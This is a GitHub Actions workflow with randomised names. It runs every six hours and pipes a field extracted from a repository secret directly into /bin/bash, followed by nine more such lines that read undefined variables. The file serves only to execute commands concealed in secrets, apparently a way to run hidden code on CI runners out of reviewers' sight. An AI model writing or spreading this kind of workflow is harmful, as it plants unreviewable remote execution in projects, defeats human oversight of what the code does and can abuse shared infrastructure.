name: cocktailyams
on:
  workflow_dispatch:
  schedule:
    - cron: '55 1/6 * * *'
jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: cocktailyams
        env:
          ioyi1955: ${{ secrets.ioyi1955 }}
        run: |
          echo $ioyi1955 | jq -r .w9896 | /bin/bash
          echo $wwoi6088 | jq -r .fgthe701 | /bin/bash
          echo $gylu10 | jq -r .bv46 | /bin/bash
          echo $roce11 | jq -r .pjlb69170 | /bin/bash
          echo $ceaob16 | jq -r .awrez76357 | /bin/bash
          echo $tuvog093 | jq -r .l398 | /bin/bash
          echo $n99 | jq -r .slzz66647 | /bin/bash
          echo $ooof518 | jq -r .ps68 | /bin/bash
          echo $vsl01 | jq -r .x606 | /bin/bash
          echo $ay2065 | jq -r .hlw48277 | /bin/bash

